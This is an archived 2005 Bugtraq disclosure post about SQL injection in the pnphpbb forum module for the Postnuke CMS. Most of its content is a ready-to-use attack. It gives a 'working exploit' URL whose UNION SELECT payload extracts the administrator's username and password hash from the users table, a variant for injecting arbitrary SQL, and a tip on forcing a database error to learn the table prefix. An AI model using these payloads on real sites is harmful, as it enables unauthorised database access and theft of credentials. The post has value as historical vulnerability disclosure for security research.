lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20050301221521.7282.qmail@www.securityfocus.com> Date: 1 Mar 2005 22:15:21 -0000 From: JoCaNoR SeCuRiTy TeaM <jocanor@...il.com> To: bugtraq@...urityfocus.com Subject: [ Postnuke all versions + pnphpbb <=1.2 sql injection - jocanor ] [Postnuke all versions + pnphpbb <=1.2 sql injection - jocanor] Author: Jocanor Date: 01-03-2k5 1. -----------introduction--------. Postnuke is an open source CMS (content management system), originally based in php-nuke. (www.postnuke.com) pnphpbb is a module for postnuke based in popular forum system phpbb. (www.phpbb.com) 2. ------------the bug------------ in 26 -03-04 janek vind discovers a bug in phpbb forums, in prvmsg.php file described in the bugtraq id 9984 and the bug affects also to php-nuke; butraq privades exploits for exploit this bug in php-nuke and phpbb. But the module Pnphpbb (postnuke phpbb) is also vulnerable to this issue, and its easy to exploit: http://www.example.com/index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20[sql here] 3 -------- the exploit ---------- Working exploit: http://www.example.com/index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20pn_uname,pn_pass,pn_pass,pn_pass,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20nuke_users%20where%20pn_uid=2/* Show password hash for the user with uid = 2. 4. ------important notes----- Note: if don't works, changue the prefix nuke_ for the valid prefix, you can get the valid table prefix causing an error like this: http://www.example.com/index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20' 5----- Contact ----- Author: Jocanor Location: Spain Email: jocanor [at] gmail [dot] com JoCaNoR SeCuRiTy ReaSoNS EOF.
Powered by blists - more mailing lists